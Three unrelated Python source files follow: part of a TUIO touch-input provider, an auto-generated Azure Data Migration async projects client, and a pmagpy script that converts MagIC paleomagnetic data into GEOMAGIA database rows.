    def mot_accel(self):
        return self.m

    @property
    def rot_accel(self):
        return self.r

    @property
    def xmot(self):
        return self.X

    @property
    def ymot(self):
        return self.Y

    @property
    def zmot(self):
        return self.Z
class Tuio2dCurMotionEvent(TuioMotionEvent):
    '''A 2dCur TUIO touch.'''

    def __init__(self, device, id, args):
        super(Tuio2dCurMotionEvent, self).__init__(device, id, args)

    def depack(self, args):
        """Translate raw /tuio/2Dcur OSC arguments into event attributes."""
        self.is_touch = True
        count = len(args)
        if count < 5:
            # Position only: x, y.
            self.sx, self.sy = (float(v) for v in args[0:2])
            self.profile = ('pos', )
        elif count == 5:
            # Position + velocity vector + motion acceleration.
            self.sx, self.sy, self.X, self.Y, self.m = (
                float(v) for v in args[0:5])
            self.Y = -self.Y
            self.profile = ('pos', 'mov', 'motacc')
        else:
            # As above, plus a rectangular shape (width, height).
            self.sx, self.sy, self.X, self.Y = (float(v) for v in args[0:4])
            self.m, width, height = (float(v) for v in args[4:7])
            self.Y = -self.Y
            self.profile = ('pos', 'mov', 'motacc', 'shape')
            if self.shape is None:
                self.shape = ShapeRect()
            self.shape.width = width
            self.shape.height = height
        # TUIO's y axis points down; Kivy's points up.
        self.sy = 1 - self.sy
        super(Tuio2dCurMotionEvent, self).depack(args)
class Tuio2dObjMotionEvent(TuioMotionEvent):
    '''A 2dObj TUIO object (fiducial marker).
    '''

    def __init__(self, device, id, args):
        super(Tuio2dObjMotionEvent, self).__init__(device, id, args)

    def depack(self, args):
        """Translate raw /tuio/2Dobj OSC arguments into event attributes."""
        self.is_touch = True
        if len(args) < 5:
            # Position only: x, y.
            self.sx, self.sy = args[0:2]
            self.profile = ('pos', )
        elif len(args) == 9:
            # Marker id, position, angle, velocities and accelerations.
            self.fid, self.sx, self.sy, self.a, self.X, self.Y = args[:6]
            self.A, self.m, self.r = args[6:9]
            self.Y = -self.Y
            self.profile = ('markerid', 'pos', 'angle', 'mov', 'rot',
                            'motacc', 'rotacc')
        else:
            # As above, plus a rectangular shape (width, height).
            self.fid, self.sx, self.sy, self.a, self.X, self.Y = args[:6]
            self.A, self.m, self.r, width, height = args[6:11]
            self.Y = -self.Y
            # FIX: this branch previously advertised 'acc' (not a profile
            # name used anywhere else in this module) and omitted 'motacc'
            # even though self.m is assigned; use the same names as the
            # 9-argument branch above.
            self.profile = ('markerid', 'pos', 'angle', 'mov', 'rot',
                            'motacc', 'rotacc', 'shape')
            if self.shape is None:
                self.shape = ShapeRect()
            self.shape.width = width
            self.shape.height = height
        # TUIO's y axis points down; Kivy's points up.
        self.sy = 1 - self.sy
        super(Tuio2dObjMotionEvent, self).depack(args)
class Tuio2dBlbMotionEvent(TuioMotionEvent):
    '''A 2dBlb TUIO object.
    # FIXME 3d shape are not supported
    /tuio/2Dobj set s i x y a X Y A m r
    /tuio/2Dblb set s x y a w h f X Y A m r
    '''

    def __init__(self, device, id, args):
        super(Tuio2dBlbMotionEvent, self).__init__(device, id, args)

    def depack(self, args):
        """Translate raw /tuio/2Dblb OSC arguments into event attributes."""
        self.is_touch = True
        # sd is received but unused (presumably the blob area 'f' from the
        # spec line above — TODO confirm against the tracker's output).
        self.sx, self.sy, self.a, self.X, self.Y, sw, sh, sd, \
            self.A, self.m, self.r = args
        self.Y = -self.Y
        # FIX: the profile previously listed 'acc' (not a profile name used
        # anywhere else in this module) and omitted 'motacc' even though
        # self.m is assigned; align with the names documented on
        # TuioMotionEvent and used by the 2Dcur/2Dobj handlers.
        self.profile = ('pos', 'angle', 'mov', 'rot', 'motacc', 'rotacc',
                        'shape')
        if self.shape is None:
            self.shape = ShapeRect()
        self.shape.width = sw
        self.shape.height = sh
        # TUIO's y axis points down; Kivy's points up.
        self.sy = 1 - self.sy
        super(Tuio2dBlbMotionEvent, self).depack(args)
# registers
# Map each supported TUIO OSC path to its MotionEvent class, then expose the
# provider itself to Kivy's input factory under the 'tuio' provider name
# (referenced from config as: name = tuio,<ip>:<port>).
TuioMotionEventProvider.register('/tuio/2Dcur', Tuio2dCurMotionEvent)
TuioMotionEventProvider.register('/tuio/2Dobj', Tuio2dObjMotionEvent)
TuioMotionEventProvider.register('/tuio/2Dblb', Tuio2dBlbMotionEvent)
MotionEventFactory.register('tuio', TuioMotionEventProvider)
|
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
# Generic payload type for the per-call response hook below.
T = TypeVar('T')
# Optional 'cls' callback accepted by every operation: receives the raw
# pipeline response, the deserialized body and the response headers, and may
# transform the value returned to the caller.
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class ProjectsOperations:
    """ProjectsOperations async operations.
    You should not instantiate this class directly. Instead, you should create a Client instance that
    instantiates it for you and attaches it as an attribute.
    :ivar models: Alias to model classes used in this operation group.
    :type models: ~azure.mgmt.datamigration.models
    :param client: Client for service requests.
    :param config: Configuration of service client.
    :param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
    """
    models = _models
    def __init__(self, client, config, serializer, deserializer) -> None:
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        self._config = config
    def list(
        self,
        group_name: str,
        service_name: str,
        **kwargs: Any
    ) -> AsyncIterable["_models.ProjectList"]:
        """Get projects in a service.
        The project resource is a nested resource representing a stored migration project. This method
        returns a list of projects owned by a service resource.
        :param group_name: Name of the resource group.
        :type group_name: str
        :param service_name: Name of the service.
        :type service_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either ProjectList or the result of cls(response)
        :rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.datamigration.models.ProjectList]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.ProjectList"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2021-06-30"
        accept = "application/json"
        # Builds the GET request for one page: the first page uses the
        # templated metadata URL, subsequent pages use the service-provided
        # next_link verbatim (no extra query parameters).
        def prepare_request(next_link=None):
            # Construct headers
            header_parameters = {}  # type: Dict[str, Any]
            header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
            if not next_link:
                # Construct URL
                url = self.list.metadata['url']  # type: ignore
                path_format_arguments = {
                    'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
                    'groupName': self._serialize.url("group_name", group_name, 'str'),
                    'serviceName': self._serialize.url("service_name", service_name, 'str'),
                }
                url = self._client.format_url(url, **path_format_arguments)
                # Construct parameters
                query_parameters = {}  # type: Dict[str, Any]
                query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
                request = self._client.get(url, query_parameters, header_parameters)
            else:
                url = next_link
                query_parameters = {}  # type: Dict[str, Any]
                request = self._client.get(url, query_parameters, header_parameters)
            return request
        # Deserializes one page into (next_link, items), applying the
        # optional 'cls' hook to the item list.
        async def extract_data(pipeline_response):
            deserialized = self._deserialize('ProjectList', pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, AsyncList(list_of_elem)
        # Fetches one page; anything other than HTTP 200 raises.
        async def get_next(next_link=None):
            request = prepare_request(next_link)
            pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response
            if response.status_code not in [200]:
                error = self._deserialize.failsafe_deserialize(_models.ApiError, response)
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
            return pipeline_response
        return AsyncItemPaged(
            get_next, extract_data
        )
    list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services/{serviceName}/projects'}  # type: ignore
    async def create_or_update(
        self,
        group_name: str,
        service_name: str,
        project_name: str,
        parameters: "_models.Project",
        **kwargs: Any
    ) -> "_models.Project":
        """Create or update project.
        The project resource is a nested resource representing a stored migration project. The PUT
        method creates a new project or updates an existing one.
        :param group_name: Name of the resource group.
        :type group_name: str
        :param service_name: Name of the service.
        :type service_name: str
        :param project_name: Name of the project.
        :type project_name: str
        :param parameters: Information about the project.
        :type parameters: ~azure.mgmt.datamigration.models.Project
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: Project, or the result of cls(response)
        :rtype: ~azure.mgmt.datamigration.models.Project
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.Project"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2021-06-30"
        content_type = kwargs.pop("content_type", "application/json")
        accept = "application/json"
        # Construct URL
        url = self.create_or_update.metadata['url']  # type: ignore
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            'groupName': self._serialize.url("group_name", group_name, 'str'),
            'serviceName': self._serialize.url("service_name", service_name, 'str'),
            'projectName': self._serialize.url("project_name", project_name, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
        body_content_kwargs = {}  # type: Dict[str, Any]
        body_content = self._serialize.body(parameters, 'Project')
        body_content_kwargs['content'] = body_content
        request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200, 201]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize.failsafe_deserialize(_models.ApiError, response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
        # Both 200 (updated) and 201 (created) carry a Project body.
        if response.status_code == 200:
            deserialized = self._deserialize('Project', pipeline_response)
        if response.status_code == 201:
            deserialized = self._deserialize('Project', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services/{serviceName}/projects/{projectName}'}  # type: ignore
    async def get(
        self,
        group_name: str,
        service_name: str,
        project_name: str,
        **kwargs: Any
    ) -> "_models.Project":
        """Get project information.
        The project resource is a nested resource representing a stored migration project. The GET
        method retrieves information about a project.
        :param group_name: Name of the resource group.
        :type group_name: str
        :param service_name: Name of the service.
        :type service_name: str
        :param project_name: Name of the project.
        :type project_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: Project, or the result of cls(response)
        :rtype: ~azure.mgmt.datamigration.models.Project
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.Project"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2021-06-30"
        accept = "application/json"
        # Construct URL
        url = self.get.metadata['url']  # type: ignore
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            'groupName': self._serialize.url("group_name", group_name, 'str'),
            'serviceName': self._serialize.url("service_name", service_name, 'str'),
            'projectName': self._serialize.url("project_name", project_name, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
        request = self._client.get(url, query_parameters, header_parameters)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize.failsafe_deserialize(_models.ApiError, response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
        deserialized = self._deserialize('Project', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services/{serviceName}/projects/{projectName}'}  # type: ignore
    async def delete(
        self,
        group_name: str,
        service_name: str,
        project_name: str,
        delete_running_tasks: Optional[bool] = None,
        **kwargs: Any
    ) -> None:
        """Delete project.
        The project resource is a nested resource representing a stored migration project. The DELETE
        method deletes a project.
        :param group_name: Name of the resource group.
        :type group_name: str
        :param service_name: Name of the service.
        :type service_name: str
        :param project_name: Name of the project.
        :type project_name: str
        :param delete_running_tasks: Delete the resource even if it contains running tasks.
        :type delete_running_tasks: bool
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: None, or the result of cls(response)
        :rtype: None
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType[None]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2021-06-30"
        accept = "application/json"
        # Construct URL
        url = self.delete.metadata['url']  # type: ignore
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            'groupName': self._serialize.url("group_name", group_name, 'str'),
            'serviceName': self._serialize.url("service_name", service_name, 'str'),
            'projectName': self._serialize.url("project_name", project_name, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
        # deleteRunningTasks is only sent when the caller set it explicitly.
        if delete_running_tasks is not None:
            query_parameters['deleteRunningTasks'] = self._serialize.query("delete_running_tasks", delete_running_tasks, 'bool')
        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
        request = self._client.delete(url, query_parameters, header_parameters)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200, 204]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize.failsafe_deserialize(_models.ApiError, response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
        if cls:
            return cls(pipeline_response, None, {})
    delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services/{serviceName}/projects/{projectName}'}  # type: ignore
    async def update(
        self,
        group_name: str,
        service_name: str,
        project_name: str,
        parameters: "_models.Project",
        **kwargs: Any
    ) -> "_models.Project":
        """Update project.
        The project resource is a nested resource representing a stored migration project. The PATCH
        method updates an existing project.
        :param group_name: Name of the resource group.
        :type group_name: str
        :param service_name: Name of the service.
        :type service_name: str
        :param project_name: Name of the project.
        :type project_name: str
        :param parameters: Information about the project.
        :type parameters: ~azure.mgmt.datamigration.models.Project
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: Project, or the result of cls(response)
        :rtype: ~azure.mgmt.datamigration.models.Project
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.Project"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2021-06-30"
        content_type = kwargs.pop("content_type", "application/json")
        accept = "application/json"
        # Construct URL
        url = self.update.metadata['url']  # type: ignore
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            'groupName': self._serialize.url("group_name", group_name, 'str'),
            'serviceName': self._serialize.url("service_name", service_name, 'str'),
            'projectName': self._serialize.url("project_name", project_name, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
        body_content_kwargs = {}  # type: Dict[str, Any]
        body_content = self._serialize.body(parameters, 'Project')
        body_content_kwargs['content'] = body_content
        request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize.failsafe_deserialize(_models.ApiError, response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
        deserialized = self._deserialize('Project', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services/{serviceName}/projects/{projectName}'}  # type: ignore
|
|
#!/usr/bin/env python
import sys,os
from pmagpy import pmag
from pmagpy import contribution_builder as cb
#from datacite import DataCiteMDSClient
from habanero import Crossref
import datetime
from datetime import timedelta
import time as t
import dateutil.parser
def main():
    """
    NAME
        magic_geomagia.py

    DESCRIPTION
        Takes a MagIC file and outputs data for easier input into Max Brown's GEOMAGIA database
        Requires the habanero python package to be installed. Try "pip install habanero" if you
        get a "ModuleNotFoundError: No module named 'habanero'" error.

    SYNTAX
        magic_geomagia.py [command line options]

    OPTIONS
        -h: prints the help message and quits.
        -f FILE: the MagIC data file name that will be converted to GEOMAGIA files

    OUTPUT:
        Print to standard out the GEOMAGIA insert command for the reference and the site level data

    EXAMPLE:
        magic_geomagia.py -f magic_contribution_16578.txt

        Nick Jarboe
    """
    if '-h' in sys.argv:   # check if help is needed
        print(main.__doc__)
        sys.exit()         # graceful quit
    if '-f' in sys.argv:
        ind = sys.argv.index('-f')
        file_name = sys.argv[ind+1]
    else:
        print("MagIC file name needed. Please add the file name after the -f option.")
        sys.exit()

    # Create all the table files from the magic.txt file so they can be imported by the cb
    command = "download_magic.py -f " + file_name
    os.system(command)

    md = cb.Contribution()   # md stands for magic file data
    md.propagate_location_to_measurements()
    md.propagate_location_to_specimens()
    md.propagate_location_to_samples()
    if not md.tables:
        # BUGFIX: the original called error_log(), which is not defined anywhere in
        # this script and raised a NameError instead of reporting the problem.
        print('-E- No MagIC tables could be found in this directory')
        return

    # Contribution-level metadata used for the GEOMAGIA REFS insert
    doi = md.tables['contribution'].df.iloc[0]['reference']
    timestamp = md.tables['contribution'].df.iloc[0]['timestamp']
    contributor = md.tables['contribution'].df.iloc[0]['contributor']
    print("c=", contributor)
    contributor = contributor.replace('@', '')   # strip the EarthRef handle marker
    print("c=", contributor)

    # Look up the full bibliographic record for the DOI via Crossref
    cr = Crossref()
    ref = cr.works(doi)
    message = ref["message"]
    authors = message["author"]
    # Build a "Family F.M., ..." style author list from the Crossref record
    authorList = ""
    for author in authors:
        author_given = ""
        # assumes every author record has 'given' and 'family' -- TODO confirm for all DOIs
        names = author['given'].split(' ')
        for name in names:
            author_given += name[0] + "."
        authorList += author['family'] + " " + author_given + ", "
    authorList = authorList[:-2]   # drop the trailing ", "

    title = message['title'][0]
    year = message['created']['date-parts'][0][0]
    journal = message['short-container-title'][0]
    volume = message['volume']
    pages = '0'   # GEOMAGIA default when Crossref has no page range
    if "page" in message.keys():
        pages = message['page']
    url = "https://earthref.org/MagIC/doi/" + doi

    print("REFS")
    print("Insert into REFS values(NULL,'", authorList, "','", title, "', ", year, ", '", journal, "', ", volume, ", '", pages, "', '", doi, "', '", url, "');", sep='')
    print()
    print("ARCHEODIJ")

    sites = md.tables['sites'].df
    locations = md.tables['locations'].df
    print("UID,NUM_SAMPLES,NUM_ACC_SPEC,NUM_MEAS_SPEC,BA,SIGMA_BA,AGE, AGE_MIN,AGE_MAX,NUM_SIGMAS,AGE_ERROR_TYPE_ID,SITE_LAT, SITE_LON,VADM,SIGMA_VADM,SITE_ID,PI_METHODS_ID,AC_ID,MD_CK_ ID,AN_CORR_ID,CR_CORR_ID,DM_METHOD_ID,AF_STEP,T_STEP,DM_ ANALYSIS_ID,SPECIMEN_TYPE_ID,MATERIAL_ID,REFERENCE_ID,NUM_ C14_SAMPLES,C14_ID,CALIB_C14_AGE,CALIB_C14_AGE_SIGMA_MIN, CALIB_C14_AGE_SIGMA_MAX,NUM_C14_SIGMAS,CALC_CALIB_C14_AGE, CALC_CALIB_C14_AGE_SIGMA_MIN,CALC_CALIB_C14_AGE_SIGMA_MAX, C14_CALIB_SOFTWARE_ID,CALC_C14_CALIB_SOFTWARE_ID,C14_CALIB_DATASET_ID,CALC_C14_ CALIB_DATASET_ID,DENDRO_ID,TOT_NUM_DENDRO,NUM_DENDRO_ USED,DATING_METHOD_ID,NUM_DIR_SAMPLES,NUM_DIR_SPECIMENS,NUM_ DIR_SPEC_COLLECTED,DECL,INCL,ALPHA_95,K,VDM,SIGMA_VDM,SAMPLE_ID,c_csv,SITE_NAME, SITE_HORIZON,1000,1001,1002,1003,1004,1005,1006,1007,1008,1009,1010,1011,1012,1013,1014, SUPERSEEDED,UPLOAD_YEAR,UPLOAD_MONTH,UPLOADER,EDITOR,EDIT_DATE,NOTES")

    for index, row in sites.iterrows():
        # Intensity sample/specimen counts; -1 is GEOMAGIA's "not specified"
        int_n_samples, int_n_specimens, int_n_total_specimens, int_abs, int_abs_sigma = -1, -1, -1, -1, -1
        if 'int_n_samples' in sites.columns.values:
            int_n_samples = row['int_n_samples']
        if 'int_n_specimens' in sites.columns.values:
            int_n_specimens = row['int_n_specimens']
        if 'int_n_total_specimens' in sites.columns.values:
            int_n_total_specimens = row['int_n_total_specimens']
        if int_n_specimens == -1 and int_n_samples > 0:
            # BUGFIX: original assigned to the misspelled name int_n_spcimens,
            # so this sample-count fallback never took effect.
            int_n_specimens = int_n_samples
        if 'int_abs' in sites.columns.values:
            int_abs = row['int_abs']
            if int_abs is not None:
                int_abs = round(int_abs*1e6, 1)   # T -> microtesla
        if 'int_abs_sigma' in sites.columns.values:
            # BUGFIX: original copy/paste re-read 'vadm'-style values into vadm below;
            # here the sigma block is kept on its own column as intended.
            int_abs_sigma = row['int_abs_sigma']
            if int_abs_sigma is not None:
                int_abs_sigma = round(row['int_abs_sigma']*1e6, 1)

        # Ages: MagIC ages are converted to years BP, then to GEOMAGIA's +-AD/BC
        age, age_high, age_low = -1e9, -1e9, -1e9
        age_error_type = '0'
        if 'age_unit' not in sites.columns.values:
            print("Malformed Magic sites data table. Required column row 'age_unit' is missing")
            sys.exit()
        age_unit = row['age_unit']
        if 'age' in sites.columns.values:
            age = row['age']
            age = pmag.age_to_BP(age, age_unit)
        if 'age_high' in sites.columns.values:
            age_high = row['age_high']
            age_high = pmag.age_to_BP(age_high, age_unit)
        if 'age_low' in sites.columns.values:
            age_low = row['age_low']
            age_low = pmag.age_to_BP(age_low, age_unit)
        if 'age_sigma' in sites.columns.values:
            age_sigma = row['age_sigma']
            age_sigma = pmag.age_to_BP(age_sigma, age_unit)
            age_high = age + age_sigma
            age_low = age - age_sigma
            age_error_type = '5'   # MagIC sigma is one sigma
        if age_low > age_high:   # MagIC lets age_high and age_low be in any order. Fix that for GEOMAGIA
            age_high, age_low = age_low, age_high
        if age == -1e9:   # If only age_low and age_high are in the MagIC file then calculate the age.
            age = (age_high + age_low)/2
            age_error_type = '8'   # If MagIC age only high and low then error type is "range"
        age_min = age - age_low   # GEOMAGIA has the max and min as differences from the age, not absolute.
        age_max = age_high - age
        age_BP = age
        age = 1950 - age   # GEOMAGIA wants +-AD/BC so convert BP to AD/-BC

        lat = row['lat']
        lon = row['lon']
        vadm, vadm_sigma = -1, -1
        if 'vadm' in sites.columns.values:
            vadm = row['vadm']
            vadm = vadm/1e22   # Am^2 -> 1e22 Am^2 units used by GEOMAGIA
        if 'vadm_sigma' in sites.columns.values:
            # BUGFIX: original re-read row['vadm'] into vadm here, so vadm_sigma
            # was never taken from the table.
            vadm_sigma = row['vadm_sigma']
            vadm_sigma = vadm_sigma/1e22

        # For paleointensity codes just give the method code list and Max will decide on the right
        # GEOMAGIA code.
        method_codes = "No MagIC method codes available"
        if 'method_codes' in sites.columns.values:
            method_codes = row['method_codes']
        # Just give Max all the method codes for him to decide for now
        paleointensity_procedure = method_codes
        alteration_monitor = method_codes_to_geomagia(method_codes, 'ALTERATION_MONIT_CORR')
        multidomain_check = method_codes_to_geomagia(method_codes, 'MD_CHECKS')
        anisotropy_correction = method_codes_to_geomagia(method_codes, 'ANISOTROPY_CORRECTION')
        cooling_rate = method_codes_to_geomagia(method_codes, 'COOLING_RATE')
        demag_method = method_codes_to_geomagia(method_codes, 'DM_METHODS')
        demag_analysis = method_codes_to_geomagia(method_codes, 'DM_ANALYSIS')
        specimen_shape = method_codes_to_geomagia(method_codes, 'SPECIMEN_TYPE_ID')

        # Map MagIC geologic types onto GEOMAGIA material codes (colon-delimited lists allowed)
        materials = ""
        geologic_types = ""
        if 'geologic_types' in sites.columns.values:
            geologic_types = row['geologic_types']
        if ":" in geologic_types:
            gtypes = geologic_types.split(":")
            for gtype in gtypes:
                materials = materials + pmag.vocab_convert(gtype, "geomagia") + ":"
            materials = materials[:-1]
        else:
            materials = pmag.vocab_convert(geologic_types, "geomagia")

        # Geochronology (GM-*) method codes -> GEOMAGIA dating-method codes
        geochron_codes = ""
        if ":" in method_codes:
            gcodes = method_codes.split(":")
            for gcode in gcodes:
                if "GM-" == gcode[:3]:
                    geochron_codes = geochron_codes + pmag.vocab_convert(gcode, "geomagia") + ":"
            geochron_codes = geochron_codes[:-1]
        else:
            # NOTE(review): converts the (empty) geochron_codes, not method_codes,
            # exactly as the original did -- confirm intended behavior
            geochron_codes = pmag.vocab_convert(geochron_codes, "geomagia")
        if geochron_codes == "":
            geochron_codes = "0"

        dir_n_samples = "-1"
        if 'dir_n_samples' in sites.columns.values:
            dir_n_samples = row['dir_n_samples']
        # (the original repeated the dir_n_samples block twice; the duplicate is removed)
        # Not in MagIC; NOTE(review): the output row below prints dir_n_samples twice as in the original
        dir_n_specimens = "-1"
        # using total number of samples for total specimen number
        dir_n_total_samples = "-1"
        if 'dir_n_total_samples' in sites.columns.values:
            dir_n_total_samples = row['dir_n_total_samples']
        dir_dec = "999"
        if 'dir_dec' in sites.columns.values:
            dir_dec = row['dir_dec']
        dir_inc = "999"
        if 'dir_inc' in sites.columns.values:
            dir_inc = row['dir_inc']
        dir_alpha95 = "-1"
        if 'dir_alpha95' in sites.columns.values:
            dir_alpha95 = row['dir_alpha95']
        dir_k = "-1"
        if 'dir_k' in sites.columns.values:
            dir_k = row['dir_k']
        vdm = -1
        if 'vdm' in sites.columns.values:
            vdm = float(row['vdm'])
            vdm = vdm/1e22
        vdm_sigma = -1
        if 'vdm_sigma' in sites.columns.values:
            vdm_sigma = float(row['vdm_sigma'])
            vdm_sigma = vdm_sigma/1e22

        # Could try and get sample names from samples table (using Contribution object) but just taking the list
        # if it exists for now.
        sample_list = "-1"
        if 'samples' in sites.columns.values:
            sample_list = row['samples']
        # c_csv is in GEOMAGIA insert. What it is I don't know. Max said set to 0
        c_csv = '0'

        # This place_id is SITE_ID in GEOMAGIA; fall back state_province -> country -> continent_ocean
        place_id = "0"
        location = row['location']
        if 'state_province' in locations.columns.values:
            place = locations.loc[location, 'state_province']
            if place != "":
                place_id = pmag.vocab_convert(place, 'GEOMAGIA')
        if place_id == "0":
            if 'country' in locations.columns.values:
                place = locations.loc[location, 'country']
                if place != "":
                    place_id = pmag.vocab_convert(place, 'GEOMAGIA')
        if place_id == "0":
            if 'continent_ocean' in locations.columns.values:
                # BUGFIX: original assigned this lookup straight to place_id and then
                # tested the stale 'place', so continent_ocean was never vocab-converted.
                place = locations.loc[location, 'continent_ocean']
                if place != "":
                    place_id = pmag.vocab_convert(place, 'GEOMAGIA')

        site = row['site']
        dt = dateutil.parser.parse(timestamp)   # contribution upload time -> year/month columns
        description = "-1"
        if 'description' in sites.columns.values:
            description = row['description']
        if age_BP <= 50000:   # presumably GEOMAGIA's 50 ka age limit -- confirm
            print("0",int_n_samples,int_n_specimens,int_n_total_specimens,int_abs,int_abs_sigma,age,age_min,age_max,"1",age_error_type,lat,lon,vadm,vadm_sigma,place_id,paleointensity_procedure,alteration_monitor,multidomain_check,anisotropy_correction,cooling_rate,demag_method,"0","0",demag_analysis,specimen_shape,materials,doi,"-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1",geochron_codes,dir_n_samples,dir_n_samples,dir_n_total_samples,dir_dec,dir_inc,dir_alpha95,dir_k,vdm,vdm_sigma,sample_list,c_csv,location,site,"-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1","-1",dt.year,dt.month,contributor,"-1,-1",description,sep=',')
